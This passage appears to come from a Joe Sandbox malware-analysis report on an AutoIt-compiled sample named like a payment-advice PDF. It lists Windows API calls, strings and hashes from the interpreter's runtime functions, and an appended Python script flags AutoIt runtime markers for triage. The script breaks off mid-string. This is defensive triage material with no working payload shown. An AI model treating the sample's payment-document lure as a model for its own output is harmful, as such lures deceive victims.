                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 008B759D
                                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 008B75DB
                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 008B75ED
                                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 008B7633
                                                              • GetClientRect.USER32(00000000,?), ref: 008B763F
                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 008B7683
                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 008B7692
                                                              • GetStockObject.GDI32(00000011), ref: 008B76A2
                                                              • SelectObject.GDI32(00000000,00000000), ref: 008B76A6
                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 008B76B6
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008B76BF
                                                              • DeleteDC.GDI32(00000000), ref: 008B76C8
                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008B76F4
                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 008B770B
                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 008B7746
                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 008B775A
                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 008B776B
                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 008B779B
                                                              • GetStockObject.GDI32(00000011), ref: 008B77A6
                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 008B77B1
                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 008B77BB
                                                              Strings
                                                              Similarity
                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                              • API String ID: 2910397461-517079104
                                                              • Opcode ID: e6d012cf3e28f4ade707b49d628b66e96d47b329c915aaa39b951f644c3590c8
                                                              • Instruction ID: b06753630769cd0bceef46c71c2c792c09aafbdd9fdbeb014047256c11055aaa
                                                              • Opcode Fuzzy Hash: e6d012cf3e28f4ade707b49d628b66e96d47b329c915aaa39b951f644c3590c8
                                                              • Instruction Fuzzy Hash: 7DA14F71A50619BFEB249BA8DC4AFAB7BBAFF44710F004115FA15E72E1C670AD00CB64
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 008AAD1E
                                                              • GetDriveTypeW.KERNEL32(?,008CFAC0,?,\\.\,008CF910), ref: 008AADFB
                                                              • SetErrorMode.KERNEL32(00000000,008CFAC0,?,\\.\,008CF910), ref: 008AAF59
                                                              Strings
                                                              Similarity
                                                              • API ID: ErrorMode$DriveType
                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                              • API String ID: 2907320926-4222207086
                                                              • Opcode ID: f98a055412d161d7d7ec4506bb55fde5daa8d1e3bc84670d859fe3971269b5ed
                                                              • Instruction ID: c516e92f1bebeb4a5ddcb57ff78fd0dedf85443880bc05848b0a50f3b62d8c9a
                                                              • Opcode Fuzzy Hash: f98a055412d161d7d7ec4506bb55fde5daa8d1e3bc84670d859fe3971269b5ed
                                                              • Instruction Fuzzy Hash: D7518AB064820DEFAB1CEB24D982CB9B3A1FB0A718B204057E516E6E91DF359D05DB53
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                              • API String ID: 1038674560-86951937
                                                              • Opcode ID: c667d9f3ec19f0961e9eb2d44d01e804c03c2c0e7690bb13c1800824a948d44c
                                                              • Instruction ID: 75555a4c9de753fa543adacefc95d2ec926f032e2760a7b0ac71f51551feb171
                                                              • Opcode Fuzzy Hash: c667d9f3ec19f0961e9eb2d44d01e804c03c2c0e7690bb13c1800824a948d44c
                                                              • Instruction Fuzzy Hash: B78117B060061DAADB10AB64EC42FAF3B68FF16714F044025F905EA296FB74DE65C663
                                                              APIs
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 008C9AD2
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 008C9B8B
                                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 008C9BA7
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: 0
                                                              • API String ID: 2326795674-4108050209
                                                              • Opcode ID: 95cdabbc60382fca7623f3189f1b03f9cbc0e30ba70ffaf16a641316e30545d8
                                                              • Instruction ID: eb8103bad2534bd073a8870b7f535d53d08794dc4156eea37480a72eadf703f2
                                                              • Opcode Fuzzy Hash: 95cdabbc60382fca7623f3189f1b03f9cbc0e30ba70ffaf16a641316e30545d8
                                                              • Instruction Fuzzy Hash: 63029930108205AFEB258F24C849FAABBF5FB59314F0485ADFAD9D62A1CB74D944CB52
                                                              APIs
                                                              • GetSysColor.USER32(00000012), ref: 008CA903
                                                              • SetTextColor.GDI32(?,?), ref: 008CA907
                                                              • GetSysColorBrush.USER32(0000000F), ref: 008CA91D
                                                              • GetSysColor.USER32(0000000F), ref: 008CA928
                                                              • CreateSolidBrush.GDI32(?), ref: 008CA92D
                                                              • GetSysColor.USER32(00000011), ref: 008CA945
                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 008CA953
                                                              • SelectObject.GDI32(?,00000000), ref: 008CA964
                                                              • SetBkColor.GDI32(?,00000000), ref: 008CA96D
                                                              • SelectObject.GDI32(?,?), ref: 008CA97A
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 008CA999
                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008CA9B0
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 008CA9C5
                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 008CA9ED
                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 008CAA14
                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 008CAA32
                                                              • DrawFocusRect.USER32(?,?), ref: 008CAA3D
                                                              • GetSysColor.USER32(00000011), ref: 008CAA4B
                                                              • SetTextColor.GDI32(?,00000000), ref: 008CAA53
                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 008CAA67
                                                              • SelectObject.GDI32(?,008CA5FA), ref: 008CAA7E
                                                              • DeleteObject.GDI32(?), ref: 008CAA89
                                                              • SelectObject.GDI32(?,?), ref: 008CAA8F
                                                              • DeleteObject.GDI32(?), ref: 008CAA94
                                                              • SetTextColor.GDI32(?,?), ref: 008CAA9A
                                                              • SetBkColor.GDI32(?,?), ref: 008CAAA4
                                                              Similarity
                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                              • String ID:
                                                              • API String ID: 1996641542-0
                                                              • Opcode ID: da1ebc797243395ec44120fbe88437abfdcf0e271b807539a2323a6dac686741
                                                              • Instruction ID: cf01569f50d1706b1d54256220cad93a9635cabfbb1155f44cf22457d1693d90
                                                              • Opcode Fuzzy Hash: da1ebc797243395ec44120fbe88437abfdcf0e271b807539a2323a6dac686741
                                                              • Instruction Fuzzy Hash: 0D512C71900218EFEB119FA4DC49EAE7B7AFB08320F154625FA11AB2A2D7719940DF90
                                                              APIs
                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 008C8AC1
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008C8AD2
                                                              • CharNextW.USER32(0000014E), ref: 008C8B01
                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 008C8B42
                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 008C8B58
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008C8B69
                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 008C8B86
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 008C8BD8
                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 008C8BEE
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 008C8C1F
                                                              • _memset.LIBCMT ref: 008C8C44
                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 008C8C8D
                                                              • _memset.LIBCMT ref: 008C8CEC
                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 008C8D16
                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 008C8D6E
                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 008C8E1B
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 008C8E3D
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008C8E87
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008C8EB4
                                                              • DrawMenuBar.USER32(?), ref: 008C8EC3
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 008C8EEB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                              • String ID: 0
                                                              • API String ID: 1073566785-4108050209
                                                              • Opcode ID: 3cee54d88d26b55d2c3cf18da99a7aae6e440711a411be50df2400ce975b35c4
                                                              • Instruction ID: 34793a561b7a7e390de2219a1ea080b215685d83e49309f9daa2e973b2a9d8d9
                                                              • Opcode Fuzzy Hash: 3cee54d88d26b55d2c3cf18da99a7aae6e440711a411be50df2400ce975b35c4
                                                              • Instruction Fuzzy Hash: 88E13B70940218EEDB219F64DC84FEE7BB9FB05724F10815AFA15EA291DB70DA80DF61
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 008C49CA
                                                              • GetDesktopWindow.USER32 ref: 008C49DF
                                                              • GetWindowRect.USER32(00000000), ref: 008C49E6
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 008C4A48
                                                              • DestroyWindow.USER32(?), ref: 008C4A74
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 008C4A9D
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008C4ABB
                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 008C4AE1
                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 008C4AF6
                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 008C4B09
                                                              • IsWindowVisible.USER32(?), ref: 008C4B29
                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 008C4B44
                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 008C4B58
                                                              • GetWindowRect.USER32(?,?), ref: 008C4B70
                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 008C4B96
                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 008C4BB0
                                                              • CopyRect.USER32(?,?), ref: 008C4BC7
                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 008C4C32
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                              • String ID: ($0$tooltips_class32
                                                              • API String ID: 698492251-4156429822
                                                              • Opcode ID: ebcd3ce6433db8b16f1911d9110839203cfe903d7a95180bad369f737cdb8ce0
                                                              • Instruction ID: 506cfe4b8392a787ca9f93ebd9eb0043632c1329f896a43907f145d5663a20ea
                                                              • Opcode Fuzzy Hash: ebcd3ce6433db8b16f1911d9110839203cfe903d7a95180bad369f737cdb8ce0
                                                              • Instruction Fuzzy Hash: 68B18770604350AFDB14DF68C888F6ABBE5FB88314F00891DF999DB2A1D771E845CB96
                                                              APIs
                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 008A44AC
                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 008A44D2
                                                              • _wcscpy.LIBCMT ref: 008A4500
                                                              • _wcscmp.LIBCMT ref: 008A450B
                                                              • _wcscat.LIBCMT ref: 008A4521
                                                              • _wcsstr.LIBCMT ref: 008A452C
                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 008A4548
                                                              • _wcscat.LIBCMT ref: 008A4591
                                                              • _wcscat.LIBCMT ref: 008A4598
                                                              • _wcsncpy.LIBCMT ref: 008A45C3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                              • API String ID: 699586101-1459072770
                                                              • Opcode ID: e08faf38631db58cbb90cb62c04f1d3ffb6a7edd818ef7da6c7fbb3fad437d0d
                                                              • Instruction ID: ac188dd1999aa7eae819bef56107deef94e5e0166bb789dbe93ec91ee9e433c2
                                                              • Opcode Fuzzy Hash: e08faf38631db58cbb90cb62c04f1d3ffb6a7edd818ef7da6c7fbb3fad437d0d
                                                              • Instruction Fuzzy Hash: 3641D971A002147BEB11AB788C47EBF777CFF52710F04056AFA05E6183EB79D90196AA
                                                              APIs
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008428BC
                                                              • GetSystemMetrics.USER32(00000007), ref: 008428C4
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008428EF
                                                              • GetSystemMetrics.USER32(00000008), ref: 008428F7
                                                              • GetSystemMetrics.USER32(00000004), ref: 0084291C
                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00842939
                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00842949
                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0084297C
                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00842990
                                                              • GetClientRect.USER32(00000000,000000FF), ref: 008429AE
                                                              • GetStockObject.GDI32(00000011), ref: 008429CA
                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 008429D5
                                                                • Part of subcall function 00842344: GetCursorPos.USER32(?), ref: 00842357
                                                                • Part of subcall function 00842344: ScreenToClient.USER32(009057B0,?), ref: 00842374
                                                                • Part of subcall function 00842344: GetAsyncKeyState.USER32(00000001), ref: 00842399
                                                                • Part of subcall function 00842344: GetAsyncKeyState.USER32(00000002), ref: 008423A7
                                                              • SetTimer.USER32(00000000,00000000,00000028,00841256), ref: 008429FC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                              • String ID: AutoIt v3 GUI
                                                              • API String ID: 1458621304-248962490
                                                              • Opcode ID: 30ddb2b4f79f7d60519ed61cc7b749a6f7adadf20927c562f41657e0aa5ca331
                                                              • Instruction ID: 9b81eeb057c56e9beaf42ab66e84c26481ca6436774a0402754e0afe200e7013
                                                              • Opcode Fuzzy Hash: 30ddb2b4f79f7d60519ed61cc7b749a6f7adadf20927c562f41657e0aa5ca331
                                                              • Instruction Fuzzy Hash: 43B13A71A0460ADFDB14DFA8DC49BAE7BB5FB08314F518229FA15E72A0DB74D840DB60
                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0089A47A
                                                              • __swprintf.LIBCMT ref: 0089A51B
                                                              • _wcscmp.LIBCMT ref: 0089A52E
                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0089A583
                                                              • _wcscmp.LIBCMT ref: 0089A5BF
                                                              • GetClassNameW.USER32(?,?,00000400), ref: 0089A5F6
                                                              • GetDlgCtrlID.USER32(?), ref: 0089A648
                                                              • GetWindowRect.USER32(?,?), ref: 0089A67E
                                                              • GetParent.USER32(?), ref: 0089A69C
                                                              • ScreenToClient.USER32(00000000), ref: 0089A6A3
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0089A71D
                                                              • _wcscmp.LIBCMT ref: 0089A731
                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0089A757
                                                              • _wcscmp.LIBCMT ref: 0089A76B
                                                                • Part of subcall function 0086362C: _iswctype.LIBCMT ref: 00863634
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                              • String ID: %s%u
                                                              • API String ID: 3744389584-679674701
                                                              • Opcode ID: 09cf65fca1d8ed59b9aa45fc2a7595985f4fddd0440899fedb1cc2fb4293600c
                                                              • Instruction ID: 7002ee757481b8238d0d4d9257e4e6421c2c6f1f681ef46e5105b6c51083da4a
                                                              • Opcode Fuzzy Hash: 09cf65fca1d8ed59b9aa45fc2a7595985f4fddd0440899fedb1cc2fb4293600c
                                                              • Instruction Fuzzy Hash: D5A1E031204206BFDB19EFA4C885FAAB7E8FF54314F088529F999D2191DB30E955CBD2
                                                              APIs
                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 0089AF18
                                                              • _wcscmp.LIBCMT ref: 0089AF29
                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 0089AF51
                                                              • CharUpperBuffW.USER32(?,00000000), ref: 0089AF6E
                                                              • _wcscmp.LIBCMT ref: 0089AF8C
                                                              • _wcsstr.LIBCMT ref: 0089AF9D
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0089AFD5
                                                              • _wcscmp.LIBCMT ref: 0089AFE5
                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 0089B00C
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0089B055
                                                              • _wcscmp.LIBCMT ref: 0089B065
                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 0089B08D
                                                              • GetWindowRect.USER32(00000004,?), ref: 0089B0F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                              • String ID: @$ThumbnailClass
                                                              • API String ID: 1788623398-1539354611
                                                              • Opcode ID: 090389ab8de141a9240ad15bd44d05a13ba598650b29bff26ca512836791feda
                                                              • Instruction ID: 4772e0b9d9a37e138585c4734fa09b5a02f38e21b2c1a9e67e96198e619ffc10
                                                              • Opcode Fuzzy Hash: 090389ab8de141a9240ad15bd44d05a13ba598650b29bff26ca512836791feda
                                                              • Instruction Fuzzy Hash: 39819C711082099FDF04EF14D985FAA7BE8FF54714F08846AED85CA092DB34DD49CBA2
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                              • API String ID: 1038674560-1810252412
                                                              • Opcode ID: f078628aea4ce313ff356ab65f66e23c4000a2a7f9b4457a309beaeca4d6735e
                                                              • Instruction ID: 901790b9a0d86f89875f403e6acdae7bdd03ce72d14eda1805e4b48571c95255
                                                              • Opcode Fuzzy Hash: f078628aea4ce313ff356ab65f66e23c4000a2a7f9b4457a309beaeca4d6735e
                                                              • Instruction Fuzzy Hash: F431B030A4821DABEB08FA68DD43EBE77A4FB10714F250428F512F51D2EB656F148693
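The records above (the "AutoIt v3 GUI" window class passed to CreateWindowExW, the "[CLASS:" / "[HANDLE:" / "[REGEXPTITLE:" window-description tokens compared with __wcsnicmp, the \VarFileInfo\Translation version reader) are annotations of the AutoIt v3 interpreter's own stub code, which a triager wants to set aside from functions worth reversing. The Python below is an added example written for this page, not Joe Sandbox code or any Joe Sandbox API; it assumes the layout visible above (one record runs from an "APIs" heading to its "Instruction Fuzzy Hash" line, "String ID" joins several strings with "$", and an API bullet reads Name.MODULE(args), ref: ADDR), and the marker list is the editor's own choice. The sample input is a constructed excerpt abridged from these records.

```python
"""Parse Joe Sandbox per-function annotation records (the 'APIs' list plus the
'Similarity' block) and flag functions that carry AutoIt v3 runtime markers.

Assumptions, not stated by the report: a record runs from an 'APIs' heading to
its 'Instruction Fuzzy Hash' line, and 'String ID' joins strings with '$'.
"""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Optional

# One bullet of the APIs list: Name.MODULE(args), ref: ADDR. Args may be absent
# (LIBCMT helpers) and nested bullets carry a "Part of subcall function" prefix.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)

# Strings that point at the AutoIt v3 interpreter itself: its GUI window class
# and tokens of its advanced window-description syntax (editor's choice).
AUTOIT_MARKERS = ("AutoIt v3 GUI", "[CLASS:", "[REGEXPTITLE:", "[HANDLE:")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str] = None   # set when the call sits inside a callee


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    api_string_id: str = ""
    fuzzy_hash: str = ""

    def first_ref(self) -> str:
        """Lowest direct call site; a usable label since the record gives no start RVA."""
        direct = [c.ref for c in self.calls if c.subcall_of is None]
        return min(direct) if direct else ""

    def has_autoit_markers(self) -> bool:
        return any(m in s for s in self.strings for m in AUTOIT_MARKERS)


def parse_records(text: str) -> list:
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                 # every record opens with this heading
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        if line.startswith("• String ID:"):
            body = line.split(":", 1)[1].strip()
            current.strings = [s for s in body.split("$") if s]
        elif line.startswith("• API String ID:"):
            current.api_string_id = line.split(":", 1)[1].strip()
        elif line.startswith("• Instruction Fuzzy Hash:"):
            current.fuzzy_hash = line.split(":", 1)[1].strip()
        else:
            m = API_RE.match(line)
            if m:
                args = m.group("args")
                current.calls.append(ApiCall(m.group("name"), m.group("module"),
                                             args.split(",") if args else [],
                                             m.group("ref"), m.group("sub")))
    return records


def modules_used(records) -> Counter:
    """Import modules touched across all records (USER32-heavy code is GUI stub)."""
    return Counter(c.module for r in records for c in r.calls)


def triage(records):
    """Split records into (runtime, other) on the marker strings."""
    runtime = [r for r in records if r.has_autoit_markers()]
    other = [r for r in records if not r.has_autoit_markers()]
    return runtime, other


# Constructed excerpt, abridged from the records above in the report's own layout.
SAMPLE = r"""APIs
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0084297C
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00842990
  • Part of subcall function 00842344: GetCursorPos.USER32(?), ref: 00842357
• SetTimer.USER32(00000000,00000000,00000028,00841256), ref: 008429FC
Strings
Similarity
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
• Instruction Fuzzy Hash: 43B13A71A0460ADFDB14DFA8DC49BAE7BB5FB08314F518229FA15E72A0DB74D840DB60
APIs
Strings
Similarity
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 1038674560-1810252412
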